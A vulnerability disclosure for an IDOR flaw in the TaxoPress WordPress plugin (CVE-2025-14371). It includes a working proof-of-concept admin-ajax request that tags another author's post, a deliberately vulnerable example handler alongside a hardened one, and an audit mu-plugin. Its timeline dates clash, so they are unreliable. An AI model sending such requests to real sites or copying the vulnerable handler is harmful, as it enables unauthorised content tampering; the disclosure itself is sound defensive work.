CVE-2025-14371 affects TaxoPress and breaks a core WordPress safety boundary: a user may have access to an editor feature, but that access must not let them change content they cannot edit. The vulnerability allows any authenticated user who is permitted to use the TaxoPress AI metabox, typically Contributor or Author and above, to add or remove tags on posts they do not own by supplying a victim post ID. This is a direct content integrity issue because tags and other taxonomy terms drive search relevance, internal navigation, feeds, and SEO surfaces, so a low-privilege account can silently reshape how content is discovered even though the same user cannot open the post editor for the target post. The install base is significant at 50k plus, so multi-author environments where Contributors exist are realistic targets rather than edge cases.
| Field | Value |
|---|---|
| CVE | CVE-2025-14371 |
| Plugin Version | TaxoPress <= 3.41.0 |
| All Time | 5 785 174 |
| Active installations | 50 000+ |
| Publicly Published | January 5, 2025 |
| Last Updated | January 5, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-14371 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-tags/taxopress-3410-missing-authorization-to-authenticated-contributor-arbitrary-post-tag-modification |
Timeline
| Date | Event |
|---|---|
| November 26, 2025 | Plugin testing and vulnerability detection in TaxoPress have been completed |
| November 26, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 5, 2025 | Registered CVE-2025-14371 |
Discovery of the Vulnerability
The weakness is an object-level authorization bypass. The handler validates a TaxoPress AI nonce and checks general metabox permissions, yet it never performs the standard WordPress per-object permission check, current_user_can( 'edit_post', $post_id ), for the post being modified. In other words, the code proves the caller is allowed to use the AI feature, but it never proves the caller is allowed to modify the specific post referenced by post_id. The vulnerable logic lives in modules/taxopress-ai/classes/TaxoPressAiAjax.php around lines 681 through 797, and the actual mutations occur where terms are inserted and assigned using functions like wp_set_object_terms, wp_remove_object_terms, and wp_insert_term, without a guard that binds the action to an authorized post. This is the exact pattern that produces IDOR-style horizontal privilege escalation in WordPress plugins.
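To make the missing guard concrete, here is an added example (not TaxoPress's code) of a generic admin-ajax handler that assigns taxonomy terms to a post. The first function reproduces the shape described above: a valid nonce and a feature-level capability, but nothing tying the request to the post it names. The second adds the per-object checks. The action name, nonce action, function names and request field layout are hypothetical; the WordPress functions called are core APIs.

```php
<?php
// Added example, not TaxoPress code. Function and action names are hypothetical.

// VULNERABLE SHAPE: the caller is checked, the object is not.
function example_ai_add_term_vulnerable() {
    check_ajax_referer( 'example_ai_nonce', 'nonce' ); // proves a valid nonce was issued to this user
    if ( ! current_user_can( 'edit_posts' ) ) {        // generic capability, satisfied by any Contributor
        wp_send_json_error( 'forbidden', 403 );
    }
    $post_id  = absint( $_POST['post_id'] ?? 0 );        // attacker-controlled; can be any post on the site
    $taxonomy = sanitize_key( $_POST['taxonomy'] ?? '' );
    $names    = array();
    foreach ( (array) ( $_POST['added_tags'] ?? array() ) as $tag ) {
        $names[] = sanitize_text_field( $tag['name'] ?? '' );
    }
    // No check that the current user may edit $post_id: horizontal privilege escalation.
    wp_set_object_terms( $post_id, array_filter( $names ), $taxonomy, true );
    wp_send_json_success();
}

// HARDENED: bind the action to the specific object and taxonomy.
function example_ai_add_term_hardened() {
    check_ajax_referer( 'example_ai_nonce', 'nonce' );

    $post_id  = absint( $_POST['post_id'] ?? 0 );
    $taxonomy = sanitize_key( $_POST['taxonomy'] ?? '' );

    // 1. The target must be a real post.
    $post = $post_id ? get_post( $post_id ) : null;
    if ( ! $post ) {
        wp_send_json_error( 'invalid post', 400 );
    }

    // 2. The caller must be allowed to edit THIS post. The edit_post meta capability
    //    resolves to edit_others_posts / edit_published_posts etc. based on ownership
    //    and status, which is exactly the boundary a Contributor must not cross.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. The taxonomy must exist, apply to this post type, and be assignable by the caller.
    $tax = get_taxonomy( $taxonomy );
    if ( ! $tax
         || ! is_object_in_taxonomy( $post->post_type, $taxonomy )
         || ! current_user_can( $tax->cap->assign_terms ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $names = array();
    foreach ( (array) ( $_POST['added_tags'] ?? array() ) as $tag ) {
        $name = sanitize_text_field( $tag['name'] ?? '' );
        if ( '' !== $name ) {
            $names[] = $name;
        }
    }

    // Append the terms; wp_set_object_terms creates missing ones by name.
    $result = wp_set_object_terms( $post_id, $names, $taxonomy, true );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'post_id' => $post_id, 'terms' => $result ) );
}
add_action( 'wp_ajax_example_ai_add_term', 'example_ai_add_term_hardened' );
```

The important line is the current_user_can( 'edit_post', $post_id ) check: a nonce only proves the request originated from a page the user was allowed to load, and a generic edit_posts capability is held by every Contributor, so neither one says anything about the particular post in the request. Checking the taxonomy's assign_terms capability on top of that matters for sites that restrict who may assign categories or custom taxonomies.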
Understanding IDOR attacks
In WordPress, the permission model is intentionally object scoped. A Contributor may create and edit their own drafts, but they cannot alter other authors' posts unless explicitly granted. Taxonomies are not harmless metadata; they are part of the editorial product. Tags and categories influence archive pages, related content blocks, topic hubs, RSS feeds, and sometimes paid syndication flows, and they can also trigger automation such as newsletters, push notifications, and social publishing rules. When a plugin allows a user to change terms on another user's post, the attacker can manipulate the site's information architecture without touching the post body, which often makes the abuse harder to notice. Real-world abuse can include pushing competitor content into irrelevant tags, removing a post from a curated topic feed, injecting misleading tags that create reputational harm, or polluting a site's SEO strategy by attaching spammy terms that degrade topical authority.
Exploiting the IDOR Vulnerability
To exploit CVE-2025-14371, an attacker with Contributor+ cookies sends the following request, where post_id names a post the attacker does not own:

POC:

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/edit.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 140
Origin: http://127.0.0.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Contributor+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=taxopress_ai_add_post_term&nonce=st_admin_localize.ai_nonce_from_profile.php&taxonomy=post_tag&post_id=86&added_tags[0][term_id]=0&added_tags[0][name]=POC____
```
The security impact is integrity loss with practical business consequences. A malicious Contributor can target a specific high-traffic post and attach tags that redirect readers into attacker-chosen topic pages, disrupt internal linking signals, and distort analytics that depend on taxonomy grouping. On news and media sites, tags can determine where articles appear on category hubs and homepage modules, so an attacker can quietly alter editorial placement without publishing rights. On e-commerce blogs and affiliate sites, tags can drive conversion flows and landing page relevance, so term manipulation can become a subtle sabotage tactic. The risk compounds when sites use tags to trigger automation, for example pushing posts into newsletters or social queues, because an attacker can induce unexpected distribution or remove content from planned campaigns, all while leaving minimal traces compared to editing the post body.
Recommendations for Improved Security
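Because term changes leave fewer traces than edits to the post body, a site owner also wants to see when someone changes terms on a post they cannot edit. The following is an added example (not TaxoPress's code) of a small mu-plugin that does that: it hooks the core set_object_terms and deleted_term_relationships actions, which fire after wp_set_object_terms() and wp_remove_object_terms(), and writes an audit line whenever the acting user lacks edit_post for the affected post. The function names, the log prefix and the example_term_audit_event hook are hypothetical; the two core action names and their arguments are real.

```php
<?php
// Added example, not TaxoPress code. Drop into wp-content/mu-plugins/ (path is an assumption).
// Records taxonomy changes applied to a post by a logged-in user who cannot edit that post.

function example_audit_term_change( $object_id, $what, $taxonomy, $terms ) {
    if ( ! is_user_logged_in() ) {
        return; // cron, WP-CLI and imports have no acting user; nothing to attribute.
    }
    $post = get_post( (int) $object_id );
    if ( ! $post ) {
        return; // terms can also attach to non-post objects; only posts are in scope here.
    }
    if ( current_user_can( 'edit_post', $post->ID ) ) {
        return; // the normal editorial path.
    }

    $user = wp_get_current_user();
    $line = sprintf(
        'TERM_AUDIT user=%d(%s) post=%d author=%d tax=%s %s=%s ajax_action=%s ip=%s',
        $user->ID,
        $user->user_login,
        $post->ID,
        (int) $post->post_author,
        $taxonomy,
        $what,
        implode( ',', array_map( 'strval', (array) $terms ) ),
        wp_doing_ajax() ? sanitize_key( $_REQUEST['action'] ?? '' ) : '-',
        sanitize_text_field( $_SERVER['REMOTE_ADDR'] ?? '' )
    );
    error_log( $line );                         // lands in the PHP error log / debug.log
    do_action( 'example_term_audit_event', $line ); // hypothetical hook for alerting integrations
}

// Core action fired after wp_set_object_terms():
// ( $object_id, $terms, $tt_ids, $taxonomy, $append, $old_tt_ids )
add_action( 'set_object_terms', function ( $object_id, $terms, $tt_ids, $taxonomy ) {
    example_audit_term_change( $object_id, 'set', $taxonomy, $terms );
}, 10, 4 );

// Core action fired after wp_remove_object_terms():
// ( $object_id, $tt_ids, $taxonomy )
add_action( 'deleted_term_relationships', function ( $object_id, $tt_ids, $taxonomy ) {
    example_audit_term_change( $object_id, 'removed', $taxonomy, $tt_ids );
}, 10, 3 );
```

A request like the one in the PoC above, sent by a Contributor against another author's post, produces a line such as TERM_AUDIT user=7(contrib) post=86 author=2 tax=post_tag set=POC____ ajax_action=taxopress_ai_add_post_term, whereas an author tagging their own draft produces nothing. This is a detective control only: it runs after the change has been written, so the actual fix is the per-object capability check in the handler, and the audit line is what tells you whether anyone exercised the gap before the plugin was updated.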
By taking proactive measures to address IDOR flaws like CVE-2025-14371, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #HighVulnerability
Dmitrii I.
